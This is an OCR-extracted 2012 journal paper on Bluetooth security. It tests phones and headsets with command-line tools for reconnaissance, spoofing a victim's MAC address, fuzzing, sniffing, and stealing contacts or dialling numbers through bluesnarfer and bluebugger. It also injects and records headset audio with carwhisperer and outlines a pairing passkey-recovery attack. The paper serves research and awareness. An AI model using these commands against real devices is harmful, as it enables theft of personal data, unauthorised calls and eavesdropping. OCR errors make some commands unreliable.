  • 3. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 43 ln the Bluechup attack, a piconet [2] (an ad—hoc computer network using Bluetooth technology) is disrupted by a device which itself is not part of the target piconet. It spoofs any randomly selected slave and contacts the master in charge of the piconet. This leads to confusion in the network and master’s internal state gets disturbed. Blueprinting is an attack to remotely find out about characteristics of a device. All these facts led to the creation of Trifinite [11], a non-profit organization that hosts information related to activities in the area of wireless devices with special focus on security. In this paper, I have presented an overview about many of the available tools used today to find out different types of vulnerabilities. They all are discussed briefly in the following sections. 3. EXPERIMENTAL SETUP 3.1. Devices I have tested the Bluetooth vulnerabilities using the following devices: • 3 computers with build-in Bluetooth adapters. • 4 mobile phones: Sony Ericsson V630i, Nokia 6500s, Sony Ericsson W715, and Nokia 6230i. • 2 headsets: Samsung WEP250 and Vivanco BTC5. Bluetooth devices have a unique MAC address [2] which identifies them over the network. In Table 1, I listed the computers’ addresses, phones and headsets used in my experiments. 3.2. HCI Tools There are two basic tools available: hciconfig and hcitool which are included in the BlueZ [13] package (the official Bluetooth stack for Gnu/linux). Both tools are executed under several Gnu/linux distributions: Backtrack 4 [14], Ubuntu 10.04 and Kubuntu 10.04. Figure 3. Sony Ericsson and Nokia mobile phones. Figure 4. Samsung WEP250 and Vivanco BTC5 headsets
  • 4. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 44 The hciconfig command shows all the information about the Bluetooth built-in adapter including name and class. The class field defines the category of the device and can be modified [15]. To show all the settings of the Bluetooth built-in adapter the following command applies: Device Name MAC Address Computer 1 pc-robayet 00:24:2C:B4:07:3B Computer 2 pc-jishan 00:22:69:FD:F1:ED Computer 3 pc-dihan 00:26:5E:C2:EA:08 Sony Ericsson V630i v630i 00:19:63:9A:1A:BE Sony Ericsson W715 w715 00:25:E7:27:86:D1 Nokia 6500s nokia6500s 00:21:AA:83:80:A7 Nokia 6230i nokia6230i 00:12:D2:4B:0D:70 Samsung WEP250 Wep250 00:21:19:06:6A:FA Vivanco BTC5 Btc5 00:07:B0:11:8F:6D Table 1. List of devices involved in the experiments $ hciconfig -i hci0 -a hci0: Type: BR/EDR Bus: USB BD Address: 00:26:5E:C2:EA:08 ACL MTU: 1021:8 SCO MTU: 64:1 UP RUNNING PSCAN ISCAN .... Link mode: SLAVE ACCEPT Name: 'pc-jishan' Class: 0x5a0l00 Service Classes: Networking, Capturing, Object Transfer, Telephony Device Class: Computer, Uncategorized .... Manufacturer: Broadcom Corporation (15) Moreover, hciconfig can be used to activate/deactivate the Blue-tooth system, enable encryption or authentication and change many other settings. In some attacks it may be useful to change the class to 0x500204 in order to be detected as a mobile phone. $ hciconfig -i hci0 class 0x500204 In the other hand, hcitool is used to configure Bluetooth connections and sends some special commands to Bluetooth devices. For instance, the most basic function is to scan visible devices.
  • 5. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 45 $ hcitool -i hci0 scan 00:21:AA:83:SO:A7 nokia6500s 00:25:E7:27:86:D1 w715 00:12:D2:4B:OD:70 nokia6230i ... Besides, it is also possible to create/delete baseband connections, display received signal strength information, request authentication, enable/disable encryption and change the connection link key among others. 3.3. Pinging Devices In order to find out the status of any Bluetooth device, the best way is to ping using the 12ping command. The following example shows how to ping nokia6500s sending five packets with a delay of two seconds among them. $ sudo 12ping -i hci0 -c 5 -d 2 00:21 :AA :83:80:A7 Ping: 00:21:AA:83:80:A7 from 00:22:69:FD:F1:ED (data size 44) 0 bytes from 00:21:AA:83:80:A7 id 0 time 28.72ms 0 bytes from 00:21:AA:83:80:A7 id 1 time S.82ms … 5 sent, 5 received, 0%, loss 3.4. RFCOMM Connections In order to associate one computer with another Bluetooth-enabled device a RFCOMM connection must be established. It is very easy to create one using the rfcomm linux command just specifying the target MAC address and channel. For instance, to associate one computer with the Samsung WEP250 headset it is enough to type: $ sudo rfcomm -i hci0 connect 0 00:21:19:06:6A:FA 1 Connected /dev/rfcomm0 to 00:21:19:06:6A:FA on channel 1 Press CTRL-C for hangup As a result the virtual device /dev/rfcomm0 was successfully created. 3.4. Compiling Code Unfortunately many of the applications which were included in the BackTrack Gnu/linux distribution were not really updated. Sometimes I have needed to fix them because they used obsolete definitions of RFCOMM nodes. In order to compile code that uses BlueZ libraries it was necessary to install the libbluetooth development libraries (available at the standard Ubuntu repositories). Once installed, the gcc GNU compiler find them and works properly. For instance, in order to compile the bluesnarfer application I have typed:
  • 6. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 46 $ cd bluesnarfer/ $ make gcc -Iinclude -W -g3 -Ibluetooth src/bluesnarfer.c -o bluesnarfer $ . /bluesnarfer 4. MAIN THREATS 4.1. Surveillance Surveillance is a method used to acquire specific details about devices. 4.1.1. Available Tools • BT-Audit: It provides applications to scan the L2CAP and RFCOMM, which are the main Bluetooth protocols. It is a simple tool which combines the output of the hcitool, sdptool, psm_scan and rfcomm_scan commands. It gives all the relevant information without any permission to perform an attack. 4.1.2. Execution At the beginning, I would like to start an attack against nokia6500s, at first I would like to know all the services which are provided and which Bluetooth channels are assigned to them. $ bt.audit 00:21:AA:83:80:A7 output.txt $ cat output.txt BD Address: 00:21 :AA:83:80:A7 Device Name: nokia6500s LMP Version: 2.0 (0x3) LMP Subversion: 0x2222 Manufacturer: Broadcom Corporation (15) Features: 0xbf 0xee 0x0f 0xce 0x98 0x39 0x00 0x00 <3-slot packets> <5-slot packets> <encryption> <slot offset> <timing accuracy> <role SHitch> <sniff mode> <RSSI> <channel quality> <SCO link> <HV3 packets> <u-law log> <A-law log> <CVSD> <paging scheme> <power control> <transparent SCO> <EDR ACL 2 Hbps> <EDR ACL 3 Hbps> <enhanced iscan> <inquiry with RSSI> <extended SCO> <AFH cap. slave> <AFH class. slave> <3-slot EDR ACL> <5- slot EDR ACL> <AFH cap. master> <AFH class. master> <EDR eSCO 2 Mbps> Attribute Identifier : 0x0 - ServiceRecordHandle Integer : 0x10000 Attribute Identifier : Oxl - ServiceClassIDList Data Sequence UUID16 : 0x1116 - NAP (PJN/BNEP) Attribute Identifier : 0x4 - ProtocolDescriptorList Data Sequence Data Sequence UUID16 : 0x0100 - L2CAP
  • 7. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 47 Channel/Port (Integer) : 0xf Data Sequence UUID16 : 0x000f - BNEP Channel/Port (Integer) : 0x100 Data Sequence Protocol (Integer) : 0x86dd Channel/Port (Integer) : 0x806 ... [447 lines more] 4.2. Obfuscation Attackers can use obfuscation to achieve a level of anonymity for launching an attack. 4.2.1. Available Tools • HCIconfig: With this application a Bluetooth-enabled device can change its name and class. • SpoofTooph [16]: Designed to automate spoofing or cloning Bluetooth device name, class and address. 4.2.2. Execution Firstly, I have checked the standard configuration of the Bluetooth built-in adapter called pc- dihan: $ hciconfig -a hci0: Type: BR/EDR Bus: USB BD Address: 00:26:5E:C2:EA:08 ACL MTU: 1021:8 SCO MTU: 64:1 ... Name: 'pc-dihan’ Class: 0xSa0l00 Service Classes: networking, Capturing, Object Transfer, Telephony Device Class: Computer, Uncategorized ... At this moment, I have retrieved the information of the victim (mobile phone called v630i) using SpoofTooph: $sudo spoottooph -i hci0 -n v630i -a 00:19:63:9A:1A:BE -c 0x500204 Class Set: 0x500204 Name Set: v630i
  • 8. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 48 Manufacturer: Broadcom Corporation (15) Device address: 00:26:5E:C2:EA:08 New BD address: 00:19:63:9A:1A:BE Finally, I have checked that obfuscation has performed properly: $ hciconfig -a hci0: Type: BR/EDR Bus: USB BD Address: 00:19:63:9A:1A:BE ACL MTU: 1021:8 SCO MTU: 64:1 Name: 'v630i' Class: 0x500204 Service Classes: Object Transfer, Telephony Device Class: Phone, Cellular … Manufacturer: Broadcom Corporation (15) Now, I can observe that the Bluetooth adapter has the name and MAC address of the victim. 4.3. Fuzzer Fuzzing is a technique used to test application input handling. Fuzzers operate by submitting nonstandard input to an application to achieve malicious results. 4.3.1. Available Tools • Bluetooth Stack Smasher (BSS): It is a tool for assembling and sending packets to a target device. • BlueSmack: This can be used to generate a non-standard size of echo message response packet just like an ICMP ping. 4.3.2. Execution Despite I have found phones with older versions of Bluetooth, fuzzer attacks are completely deprecated because the exploited vulnerabilities were fixed. Bluetooth Stack Smasher (BSS) and bluesmack have become completely useless. An example is shown below which produces absolutely no effect in the victim (v630i). Loop mode (-M 0) is set with packet size of 1000 bits. $ sudo ./bss -m 12 00:19:63:9A: 1A:BE -H 0 -s 1000 4.4. Sniffing Sniffing [17] is an attack that intercepts and can log traffic passing over a digital network or part of a network. 4.4.1. Available Tools
  • 9. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 49 • HCIDump: It is an utility that can capture and read raw Bluetooth traffic by monitoring local Bluetooth interfaces and capturing data from sniffed traffic. 4.4.2. Execution The following example shows the sniffing result while pc-jishan attempts to ping nokia6500s. $ sudo hcidump -i hci0 -X -V HCI sniffer - Bluetooth packet analyzer ver 1.42 device: hci0 snap_len: 1028 filter: Oxffffffff < HCI Command: Create Connection (0x0110x0005) plen 13 bdaddr 00:21:AA:83:80:A7 ... Packet type: DM1 DM3 DMS DH1 DH3 DH5 > HCI Event: Command Status (OxOf) plen 4 Create Connection (0x0110x0005) status 0x00 ncmd 1 ... < ACL data: handle 11 flags 0x02 dlen 52 L2CAP(s): Echo req: dlen 44 0000: 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4a 4f 50 0010: 51 52 53 54 55 56 57 58 59 5a Sb 5c 5d 5e 5f 60 0020: 61 62 63 64 65 66 67 68 41 42 43 44 ABCDEFGHIJKLMNOP QRSTUVMYZ[]-_' abcdefghABCD Furthermore, the content of every message is displayed both in hex and ASCII codification. 4.5. Denial of Service (DoS) Denial of service is an attack that can deny resources to a target. It often targets communication channels, but it can relate to any service the device uses, including system availability. This kind of attack is currently obsolete because newer Bluetooth specification fixed the vulnerabilities those applications such as blueSmack exploited using the Ping of Death. 4.6. Unauthorized Direct Data Access (UDDA) UDDA attacks gather private information for unauthorized entities by penetrating devices through loopholes in security, allowing unauthorized access to privileged information. 4.6.1. Available Tools • Bluebugger: It is a security loophole and allows the unauthorized downloading phone books and call lists, the sending and reading of SMS messages from the attacked phone. • BlueSnarfer: It connects to an OBEX [18] Push target and performs an OBEX GET request for known filenames, such as pb.vcl for the devices phone book or cal.vcs for
  • 10. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 50 the devices calendar file. In case of improper implementation of the device firmware, an attacker is able to retrieve all files where the name is either known or guessed correctly. 4.6.2. Execution Firstly, it was required to modify some code of bluesnarfer. Instead of accessing to /dev/bluetooth/rfcomm/ we will simply use /dev/rfcomm. After bluesnarfer was re-compiled, I have performed several attacks to the four mobile phones. I have noticed that the newer versions of Bluetooth fixed the vulnerability exploited by bluesnarfer. Thus, there is a partial attack that means, for every action there will be an authorized association between phone and computer. This means that at least a message such as "Connect with pc-XXX?" will be prompt in the phone screen. bluesnarfer is able to retrieve all the contact phone list, messages, find/delete contact numbers and dials numbers once the connection is done. This attack was performed successfully on all the mobile phones of the experiment. $ sudo ./bluesnarfer -r 1-80 -C 1 -b 00:12:D2:4B:OD:70 ... + 1 - rahim : +92321661... + 20 - karim : +4676581... + 20 - rajib : +4676346... + 20 - mutmain : 073647... + 20 - Asif : 0300650. .. bluesnarfer: release rfcomm ok $ sudo ./bluesnarfer -f Asif -C 1 -b 00:12:D2:4B:OD:70 ... start to search name: Asif + 16 - Asif : 0300650... bluesuarfer: release rfcomm ok On the other hand, bluebugger exploits the same vulnerability but it is able to dial contact numbers once the connection was established. Again, is a partial attack but very powerful if a confused user accept the incoming connection. The following examples show how to obtain basic information and dial any number: $ sudo ./bluebugger -c 1 info -a 00:21:AA:83:80:A7 ... Target Device: '00:21:AA:83:80:A7' Target Name: 'nokia6S00s' Manufactor: Nokia Model: Nokia 6500S-1 Revision: V 06.60 07-03-08 RM-240 (c) Nokia
  • 11. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 51 PSN/IMEI: 3B483702818... Capability: +CGSM,+DS,+W $ sudo ./bluebugger dial 0046123466789 -a 00:19:63:9A:1A:BE -c 1 ... Target Device: '00:19:63:9A:1A:BE' Target Name: 'v630i' Dialing '0046707225985' to '0046123456789' should be active now Press <enter> to abort Bluetooth connection *shows 'cancel call too?'-popup on Nokia 6310i 4.7. Man-in-the-Middle MITM [2, 19] is a scenario in which an attacker makes independent connections with the victims and relays messages between them. 4.7.1. Available Tools • Bluebugger: It is a security loophole and allows the unauthorized BT-SSP Printer; this application shows possible vulnerabilities in the newer Bluetooth standards. The BT- SSP-Printer-MITM attack sets the attacker's device as a relay point between the user device and a printer. • Car whisperer: Initially developed for carkits, this application is able to establish a connection with a headset in order to inject and record audio. 4.7.2. Execution It is possible to perform a headset attack (Samsung WEP250) in order to retrieve and inject audio without permission using carwhisperer. As an initial setup, this headset was already associated with a mobile phone. Some modifications were made in the source code in order to carry out the attack properly. Due to important changes in the BlueZ linux protocol stack [12], the latest version [13] does not include legacy support. To be precise, the function call rfcomm_connect was deleted and instead, a file descriptor was used for a RFCOMM channel using I/O redirection. To start the experiment, I have connected the computer and headset using one RFCOMM channel: $ sudo rfcomm -i hci0 connect 0 00:21:19:06:6A:FA 1 Connected /dev/rfcomm0 to 00:21:19:06:6A:FA on channel 1 Press CTRL-C for hangup Then, the audio is injected to the headset sound is recorded from it at the same time invoking carwhisperer with the proper parameters. The audio injected correspond to the message.raw file and the output will be saved as out.raw.
  • 12. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 52 $ sudo ,/caruhisperer hciO message.raw out.raw 00:21:19:06:6A:FA 1 3<> /dev/rfcomm0 Voice setting: 0x0060 RFCOMM channel connected SCO audio channel connected (handle 6, mtu 64) ... got: AT+BRSF=26 ansewered: +BRSF: 63 ... In order to start listening, it is necessary to convert the recorded audio (out. raw) to a waveform audio file format (wav): $ sudo sox -c 1 -r 8k -e signed -b 16 out.raw out.wav Finally, the recorded file retrieved from the headset can be played: $ aplay out.wav Playing WAVE 'out.wav': Signed 16 bit Little Endian, Rate 8000 Hz, Mono 4.8. Further Attacks (Password Guessing) IMITM Regarding Bluetooth 2.1 specification [20], almost all devices with display are still vulnerable to attacks. This issue takes place when the user enters the password on IU level as in the passkey entry mode. In this scenario, the devices establish a connection using the same password, and attackers without such information fail attempting to pair. Even with the new security mechanisms adopted in this version, a man-in-the-middle attack could be feasible. Attacks can be effective when the same password is used to pair multiple times, or when there is a fixed random password provided by an automatic pairing agent. These threats come from a bad implementation of the pairing protocol, especially in the public-key exchange stage. In this protocol, the devices exchange messages for a Diffie-Hellman key exchange [2] over an Elliptic curve group. In addition, these messages can be stored in the devices as public keys. At this stage, the handshake protocol is described as follows: a device A sends its public key PKa to device B, and the latter plies with its public key PKb. Now, both derive SK which is the Secret key from the Diffie-Hellman key exchange with messages PKa andPKb. In order to begin this conversation, most devices require the user to press a button in order to pair, and once pairing has been carried out, the user doesn't have to verify the communication again. However and despite the fact that the implementation follows the specification [21], after the attacker has learned the password it can force the devices to re-pair [22]. Then, the attacker can carry out an unauthorized direct data access (UDDA) pairing its own device first, or performing a man-in-the-middle attack.
  • 13. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 53 In this section, I will state two main attacks taking the advantage of the security leak mentioned above. First, a passive eavesdropping attack is presented and later an active attack on password- protected devices is explained. 4.8.1. Available Tools Using a Bluetooth packet analyzer, attackers can learn the password on a legitimate pairing procedure between two devices in a short period of time, even if they share a very long key. The weak part of the protocol resides in the option to establish a pairing process once again with the same password. Figure 5. Authentication stage 1: numeric comparison protocol. (Adapted from [20, p.1601]) The devices iterate exchanging commitments to bits of the passwords. Every bit corresponds to iteration where the attacker can extract the following information (notation used from the Bluetooth Core Specification [20]): • PKa: public key of device A • PKb: public key of device B • Cai: commitment C for A in iteration i • Cbi: commitment C for B in iteration i • Na:. random nonce N chosen by A in iteration i • Nbi: random nonce N chosen by B in iteration i Hence, the only missing value is rai, the ith bit of the password from device A. This is calculated by computing a single HMAC-SHA256 which can be set for instance to 0 in the given formula fi (PKa, PKb,Nai,0). Here, fi is HMAC-SHA256 with key Nai and input (PKa,PKb, rai).
  • 14. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 54 Figure 6. Packet analysis of the pairing protocol. If the result matches with Cai, it concludes that rai = 0, or rai = 0 by process of elimination. It is easy to conclude that given PKa, PKb and both all the commitments (Cak) and nonces (Nak), the password could be derived with only k HMAC-SHA256 computations. 4.8.2. Active Attack on Password-Protected Devices Using a Bluetooth Another attack can be carried out if the attacker is able to make repeated pairing attempts with a device that has a fixed random password. This threat is even easier if the target has an automatic pairing feature, which is common in most of the current devices. The algorithm to perform the attack assumes the attacker A plays the role of initiator in a pairing protocol with B as follows: Figure 7. Public key exchange (Adapted from [20, p.428]) 1. The attacker runs the public key exchange and the authentication steps. Following the specification, these steps have to be carried out to verify that man-in-the-middle attacks were not performed. 2. The attacker computes Ca, using a random value such as rai = 0. 3. After receiving Cbi from device B, the attacker sends Nal to B and waits for the reply. If B continues, then the attacker knows that rbi = 0. Go to 1 for the next iteration i + 1. 4. If B aborts, regardless the initial value, the attacker knows finally rb1. Go to 1 to verify again the current iteration i with the correct rb1 value. It is relevant that in the algorithm, B aborts statistically half of the time. This means for instance that when a random 6 digit password is used, the attacker can learn the fc-bit password after only 10 attempts (a 6 digit password requires approximately 20 bits).
  • 15. International Journal of Network Security & Its Applications (IJNSA), Vol.4, No.3, May 2012 55 In order to prevent the eavesdropping attack [6], after the first public key exchange stage, the devices should derive the Diffie-Hellman key DHKey. With this modification, the attacker would not leak the password because both the commitments (Cai) and nonces (Nai) are now encrypted by a key that only the legitimate pairing devices know. Figure 8. Authentication Passkey entry (adapted from [20, p.432]) Another way to increase the security in the passkey entry mode is using a different random password each time a connection is established. Some researches [6] suggest a new secure password protocol to prevent attacks when the DHKey is known [23]. 5. FURTHER IMPROVEMENTS My last experiment has showed clearly that nowadays it is perfectly possible to inject and record audio on headsets. This vulnerability might be fixed very soon in the Bluetooth technology. However, most of the Bluetooth built-in adapters use very low power therefore this experiment cannot be performed within large distances, but it is always possible to purchase better adapters or powerful antennas. Considering my first hacking environment (Backtrack Gnu/Linux), I have noticed a lack of updates in the Bluetooth applications included. Furthermore, the drivers for the Bluetooth adapters are properly upload but there is no widget or manager running by default. This means that RFCOMM connections cannot be established in this operating system unless a Bluetooth manager is installed (without this, it is impossible to type PTN codes so connections are refused). Fortunately, I have decided to test the applications in my own Gnu/Linux systems, where the experiments have performed successfully. 6. CONCLUSION Based on the above research, it is obvious that on one side different types of vulnerabilities in Bluetooth-enabled mobile devices have identified and simultaneously the Bluetooth standard is updating to remove these vulnerabilities. The tests and experiments have proved that most of the modern devices such as headphones and PCs are more protective against different types of attacks because in most of the scenarios, the user has to accept the connection. However the successful attacks for the devices with low interactivity such as Bluetooth headphones revealed that it is possible to inject or record sounds in these devices without authenticated connection. The purpose of this paper is to highlight the security issues of the Bluetooth-enabled devices. REFERENCES [1] The official Bluetooth technology info site, http: // [2] Chi Shing Lee. Bluetooth Security Protocol Analysis and Improvements, M.Sc. thesis at San Jose State University, [3] HCI Architecture, Architecture _Host.Controller. Interface_HCI.aspx
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